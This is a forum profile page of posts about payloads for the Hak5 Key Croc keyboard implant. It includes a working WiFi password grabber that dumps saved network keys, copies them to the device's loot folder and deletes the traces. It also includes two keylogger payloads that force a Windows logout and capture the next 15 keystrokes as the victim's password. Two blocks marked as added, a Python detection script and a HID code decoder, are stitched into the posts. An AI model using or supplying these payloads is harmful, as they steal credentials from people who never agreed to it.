RootJunky

Active Members
  • Content Count: 18
Everything posted by RootJunky

  1. This is what I have so far:

         MATCH wifidesktop
         QUACK LOCK
         QUACK DELAY 1000
         # --> Minimize all windows
         QUACK GUI d
         # --> Open cmd
         QUACK GUI r
         QUACK DELAY 500
         QUACK STRING powershell
         QUACK ENTER
         QUACK DELAY 500
         # --> Get all SSID
         QUACK STRING \(netsh wlan show profiles\) \| Select-String \"\\:\(.+\)\$\" \| \%\{\$name=\$_.Matches.Groups\[1\].Value.Trim\(\)\; \$_\} \| \%\{\(netsh wlan show profile name=\"\$name\" key=clear\)\} \| Select-String \"Key Content\\W+\\:\(.+\)\$\" \| \%\{\$pass=\$_.Matches.Groups\[1\].Value.Trim\(\)\; \$_\} \| \%\{\[PSCustomObject\]\@\{ PROFILE_NAME=\$name\;PASSWORD=\$pass \}\} \| Format-Table -AutoSize \| Out-File \"\$env:userprofile\\Desktop\\WirelessNetworkPasswords.txt\"
         QUACK DELAY 1000
         QUACK ENTER
         # --> Available wifi networks that are visible
         QUACK STRING netsh wlan show networks \| Out-File \"\$env:userprofile\\Desktop\\WirelessNetworks.txt\"
         QUACK ENTER
         # --> Switching device to usb storage
         udisk unmount
         ATTACKMODE HID STORAGE
         QUACK DELAY 5000
         # --> copy files to KeyCroc and deleting from target PC
         QUACK STRING \$Croc = \(gwmi win32_volume -f \'label=\"KeyCroc\"\' \| Select-Object -ExpandProperty DriveLetter\)
         QUACK ENTER
         QUACK STRING xcopy /y "Desktop\WirelessNetworks.txt" $Croc\loot\
         QUACK ENTER
         QUACK STRING xcopy /y "Desktop\WirelessNetworkPasswords.txt" $Croc\loot\
         QUACK ENTER
         QUACK STRING del "Desktop\WirelessNetworks.txt"
         QUACK ENTER
         QUACK STRING del "Desktop\WirelessNetworkPasswords.txt"
         QUACK ENTER
         QUACK STRING exit
         QUACK ENTER
         # --> Returning to HID Mode
         ATTACKMODE HID
         QUACK DELAY 5000
         ATTACKMODE HID
         QUACK UNLOCK

     The problem that I am having is that the ATTACKMODE HID STORAGE doesn't really mount the keycroc to my PC correctly. This makes it so that the $Croc doesn't work, so that copy of the files from desktop fails. Note: if I ssh and run commands udisk unmount and ATTACKMODE HID STORAGE then the storage shows up correctly and I can xcopy with the script.
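For defenders, the command sequence in the post above is visible in PowerShell script block logging on the target host. The following is an added example, not part of the original post: it triages logged commands per host, and the event tuples, host names, rule names and the two-minute window are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Patterns derived from the commands quoted in the post above.
RULES = {
    "wlan_key_export": re.compile(
        r"netsh\s+wlan\s+show\s+profiles?\b.*\bkey\s*=\s*clear", re.I | re.S),
    "volume_by_label": re.compile(r"win32_volume\b.*\blabel\s*=", re.I | re.S),
    "copy_out": re.compile(r"\b(xcopy|robocopy|copy-item)\b", re.I),
    "cleanup": re.compile(r"\b(del|erase|remove-item)\b", re.I),
}
WINDOW = timedelta(minutes=2)  # assumed correlation window
STAGING = {"volume_by_label", "copy_out", "cleanup"}

# Constructed sample events: (timestamp, host, logged script text).
EVENTS = [
    ("2024-05-01T09:00:00", "WS-014",
     r'(netsh wlan show profiles) | %{(netsh wlan show profile name="$name" key=clear)}'),
    ("2024-05-01T09:00:20", "WS-014",
     r"""$Croc = (gwmi win32_volume -f 'label="KeyCroc"').DriveLetter"""),
    ("2024-05-01T09:00:25", "WS-014", r'xcopy /y "Desktop\out.txt" E:\loot'),
    ("2024-05-01T09:00:30", "WS-014", r'del "Desktop\out.txt"'),
    ("2024-05-01T10:15:00", "WS-020", 'netsh wlan show profile name="Office" key=clear'),
    ("2024-05-01T11:00:00", "WS-031", "netsh wlan show profiles"),
]

def classify(text):
    """Names of every rule whose pattern appears in the logged text."""
    return {name for name, rx in RULES.items() if rx.search(text)}

def triage(events):
    """Map host -> 'high' (export plus volume lookup, copy, delete in WINDOW) or 'medium'."""
    by_host = {}
    for ts, host, text in events:
        by_host.setdefault(host, []).append((datetime.fromisoformat(ts), classify(text)))
    verdicts = {}
    for host, rows in by_host.items():
        for start, hits in rows:
            if "wlan_key_export" not in hits:
                continue
            seen = set().union(*(h for ts, h in rows if start <= ts <= start + WINDOW))
            if STAGING <= seen:
                verdicts[host] = "high"
            else:
                verdicts.setdefault(host, "medium")
    return verdicts

if __name__ == "__main__":
    print(triage(EVENTS))
```

Listing profile names without `key=clear` (host WS-031 in the sample) is not flagged, which keeps routine troubleshooting out of the alert queue.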
  2. I like where you are going, and you could use this command to scan what networks the target PC can currently see available:

         netsh wlan show networks

     You can also use this in a payload to mount and unmount the croc:

         udisk [ mount | unmount | remount | reformat ]
  3. You can use this string in a payload to change the SSID in the config.txt:

         QUACK STRING $(grep -rl "WIFI_SSID" /root/udisk/config.txt | xargs sed -i 's/WIFI_SSID 2WIRE111/WIFI_SSID KeyCroc/g')

     In my example the SSID is 2WIRE111 and it will get changed to KeyCroc. I use this in a payload to change my SSID with MATCH wifichange.
  4. Totally agree, this needs to be fixed in firmware version 1.4.
  5. Yes, you nailed it. When num lock is on I get:

         12
         1
         2
         3

     When num lock is off I get:

         12

     Nothing, as you can see, but the enters.
  6. I just tested my Croc for number typing and it works just fine.

     Payload:

         MATCH 12
         QUACK ENTER
         QUACK STRING "1"
         QUACK ENTER
         QUACK STRING "2"
         QUACK ENTER
         QUACK STRING "3"
         QUACK ENTER

     typed:

         12
         1
         2
         3

     In fact, when I typed twelve above it auto ran the payload and typed the 1 2 3.
  7. Something like this might work, but if you mess it up you might lose your SSH connection to the croc. https://computingforgeeks.com/create-wi-fi-hotspot-on-ubuntu-debian-fedora-centos-arch/
  8. Yes fneagle, that is a great idea, but I don't know how to do that.
  9. You have to escape lots of expressions with the \ symbol, like I have in this payload: https://github.com/rootjunky/keycroc-payloads/blob/master/library/examples/windows-wifi-password-grabber.txt You have to do this because the Key Croc is processing those symbols as bash, unlike ducky code. Rootjunky
  10. For some reason QUACK GUI L wasn't working on my machine once control alt delete was matched but QUACK STRING GUI l works.
  11. Windows Password Grabber CAD

     This is a simple payload used to log out once control alt delete is pressed on a Windows PC, then it will capture the next 15 buttons pressed. You can edit the script to your liking. The 15 buttons saved will be stored in your loot folder.

         # Title: Windows Password Grabber
         # Description: When Control Alt Delete is pressed it will log out the current user and request a password that will be captured and stored in loot.
         # Author: RootJunky
         # Version: 1.0
         # Category: Credentials
         #
         #
         MATCH \[CONTROL-ALT-DELETE\]
         LED ATTACK STAGE1
         QUACK STRING "GUI l"
         SAVEKEYS /root/loot/password.log NEXT 15
         QUACK DELAY 1000
         LED OFF

     https://github.com/rootjunky/keycroc-payloads/blob/master/library/examples/windows-password-grabber-ctrl-alt-delete.txt
  12. Windows Password Grabber GUI L

     This is a simple payload used to capture the next 15 buttons pressed once someone presses the Windows button and L to log themselves out of a PC. You can edit the script to your liking. The 15 buttons saved will be stored in your loot folder.

         # Title: Windows Password Grabber GUI L
         # Description: When GUI L is pressed it will log out the current user and request a password that will be captured and stored in loot.
         # Author: RootJunky
         # Version: 1.0
         # Category: Credentials
         #
         #
         MATCH \[GUI-l]
         LED ATTACK STAGE1
         SAVEKEYS /root/loot/password-GUI-L.log NEXT 15
         QUACK DELAY 1000
         LED OFF

     Thanks, RootJunky

     windows-password-grabber-gui-l.txt
  13. Yes, I made this actually. I left password the same and just changed the SSID; works pretty good. Great, look forward to the new firmware v1.3.

         # Title: ssid changer 1
         # Description: Change the ssid stored in the config file
         # Author: Rootjunky
         # Version: 1.0
         # Category: Key Croc
         #
         #
         MATCH changewifi
         QUACK LOCK
         QUACK ENTER
         QUACK STRING $(grep -rl "WIFI_SSID" /root/udisk/config.txt | xargs sed -i 's/WIFI_SSID 2WIRE111/WIFI_SSID KeyCroc/g')
         QUACK STRING "wifi ssid changed to KeyCroc"
         QUACK ENTER
         QUACK UNLOCK
  14. Yes, it's a Logitech K270 https://www.logitech.com/en-roeu/product/wireless-keyboard-k270 I have hardware to capture the keycodes, but like I said I cannot get them to work from the keycroc.
  15. I did a little research into why my hot keys on my keyboard are not passing through the KeyCroc. Below are my keyboard scan codes that I captured, with the number 1 for comparison. I am guessing that the reason these buttons are not working is because they are not listed in the language US.json. I would love some help troubleshooting this problem and adding these hot keys and others to the KeyCroc. I tried to make a payload that would QUACK KEYCODE 03,CD,00 for example and match it with MATCH 1, but this will not play/pause for me. Thoughts.

         radix: hexadecimal 03 CD 00 00 00 play pause
         radix: hexadecimal 03 E2 00 00 00 mute unmute
         radix: hexadecimal 03 EA 00 00 00 volume down
         radix: hexadecimal 03 E9 00 00 00 volume up
         radix: hexadecimal 03 23 02 00 00 home
         radix: hexadecimal 03 8A 01 00 00 mail
         radix: hexadecimal 04 01 power off / sleep screen
         radix: hexadecimal 03 92 01 00 00 cal
         radix: hexadecimal 00 00 1E 00 00 00 00 00 number 1
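The captures in the post above can be decoded against the USB HID Usage Tables. This is an added example, not part of the original post; it assumes, without the keyboard's report descriptor, that report ID 0x03 carries one 16-bit little-endian Consumer page usage and that the 8-byte capture is a standard boot keyboard report.

```python
import re

# Byte captures copied from the post above (labels are the poster's).
CAPTURE = """\
03 CD 00 00 00 play pause
03 E2 00 00 00 mute unmute
03 EA 00 00 00 volume down
03 E9 00 00 00 volume up
03 23 02 00 00 home
03 8A 01 00 00 mail
04 01 power off / sleep screen
03 92 01 00 00 cal
00 00 1E 00 00 00 00 00 number 1
"""

# Usage names from the USB HID Usage Tables, Consumer page (0x0C).
CONSUMER = {0x00CD: "Play/Pause", 0x00E2: "Mute", 0x00E9: "Volume Increment",
            0x00EA: "Volume Decrement", 0x018A: "AL Email Reader",
            0x0192: "AL Calculator", 0x0223: "AC Home"}

def split_line(line):
    """Split leading two-digit hex tokens (the report) from the trailing label."""
    tokens = line.split()
    n = 0
    while n < len(tokens) and re.fullmatch(r"[0-9A-Fa-f]{2}", tokens[n]):
        n += 1
    return bytes(int(t, 16) for t in tokens[:n]), " ".join(tokens[n:])

def keyboard_key(code):
    """Name a Keyboard page (0x07) usage: letters, then digits 1-9 and 0."""
    if 0x04 <= code <= 0x1D:
        return chr(ord("a") + code - 0x04)
    if 0x1E <= code <= 0x27:
        return "1234567890"[code - 0x1E]
    return f"usage 0x{code:02X}"

def decode(report):
    """Return (kind, usage_page, names) for one captured report."""
    if len(report) == 8:  # boot keyboard layout: modifiers, reserved, 6 keys
        return "keyboard", 0x07, [keyboard_key(c) for c in report[2:] if c]
    if len(report) == 5 and report[0] == 0x03:
        # ASSUMPTION: report ID 0x03 carries one 16-bit little-endian Consumer usage.
        usage = int.from_bytes(report[1:3], "little")
        return "consumer", 0x0C, [CONSUMER.get(usage, f"usage 0x{usage:04X}")]
    return "unknown", None, []  # e.g. "04 01": layout not determinable from the page

def decode_capture(text):
    return [(label, *decode(raw)) for raw, label in map(split_line, text.splitlines())]

if __name__ == "__main__":
    for label, kind, page, names in decode_capture(CAPTURE):
        print(f"{label:26} {kind:9} page={page} {names}")
```

Under that assumption, every media key in the capture resolves to a Consumer page usage carried in its own report, separate from the 8-byte keyboard report that carries the number 1.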
  16. Can you edit the config.txt file to be able to connect to multiple wifi SSIDs? I would like to be able to connect to a local wifi network and a mobile hotspot, not at the same time but to whichever one is in range.
  17. CrocSSH By RootJunky

     Key Croc SSH login is really simple to use and makes it easy to ssh into your Key Croc with one simple command into a terminal ( crocssh ). Once you enter the command the script will erase the crocssh in the terminal and enter everything including the IP into the terminal along with the default password and get you logged into the device over ssh. First login requires you to accept the secure id, but after that this script will log you in without any problems. Suggestions welcome to improve this payload. Must type on target keyboard.

     croc-ssh-payload.txt

         # Title: Key Croc ssh login
         # Description: Logs into key croc over ssh
         # Author: RootJunky
         # Version: 1.0
         # Category: Key Croc
         #
         #
         MATCH crocssh
         QUACK LOCK
         QUACK BACKSPACE
         QUACK BACKSPACE
         QUACK BACKSPACE
         QUACK BACKSPACE
         QUACK BACKSPACE
         QUACK BACKSPACE
         QUACK BACKSPACE
         QUACK STRING "ssh root@"
         QUACK STRING $(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)
         QUACK DELAY 1000
         QUACK ENTER
         QUACK DELAY 1000
         QUACK STRING "hak5croc"
         QUACK ENTER
         QUACK ENTER
         QUACK UNLOCK

     Big thanks to Hak5 for this awesome and fun Key Croc. Developed by RootJunky
  18. CrocInfo by RootJunky

     Croc info grabber is a simple script to be able to grab a bunch of info about your Key Croc with a simple command ( crocinfo ). This payload is best used for development when you only have one PC to develop and test on. This payload will return Key Croc Firmware, IP, DNS, User, Password, Hostname, SSH, and current Attack Mode. Place file in payloads folder and type crocinfo on target keyboard in a notepad to display crocinfo.

     croc-info-payload.txt

         # Title: Key Croc Info Grabber
         # Description: Returns Info on the Key Croc
         # Author: RootJunky
         # Version: 1.0
         # Category: Key Croc
         #
         #
         MATCH crocinfo
         QUACK LOCK
         QUACK ENTER
         QUACK ENTER
         QUACK STRING "CROC FIRMWARE: "
         QUACK STRING $(cat /root/udisk/version.txt)
         QUACK ENTER
         QUACK ENTER
         QUACK STRING "IP: "
         QUACK STRING $(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)
         QUACK ENTER
         QUACK STRING "DNS: "
         QUACK STRING $(sed -n -e 4p /etc/resolv.conf)
         QUACK ENTER
         QUACK STRING "DNS: "
         QUACK STRING $(sed -n -e 5p /etc/resolv.conf)
         QUACK ENTER
         QUACK ENTER
         QUACK STRING "USER: "
         QUACK STRING $(whoami)
         QUACK ENTER
         QUACK ENTER
         QUACK STRING "PASSWORD: "
         QUACK STRING "hak5croc"
         QUACK ENTER
         QUACK ENTER
         QUACK STRING "HOSTNAME: "
         QUACK STRING $(cat /proc/sys/kernel/hostname)
         QUACK ENTER
         QUACK ENTER
         QUACK STRING "SSH: "
         QUACK STRING "ssh root@"
         QUACK STRING $(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)
         QUACK ENTER
         QUACK ENTER
         QUACK STRING "MODE: "
         QUACK STRING $(cat /tmp/mode)
         QUACK ENTER
         QUACK ENTER
         QUACK UNLOCK
         #Default Settings
         #username: root
         #password: hak5croc
         #hostname: croc

     My Results

         crocinfo
         CROC FIRMWARE:1.2_475
         IP:192.168.1.36
         DNS:nameserver 1.1.1.1
         DNS:nameserver 8.8.8.8
         USER:root
         PASSWORD:hak5croc
         HOSTNAME:croc
         SSH:ssh root@192.168.1.36
         MODE:HID VID_0X046D PID_0XC52B

     Big thanks to Hak5 for this awesome and fun Key Croc. Developed by RootJunky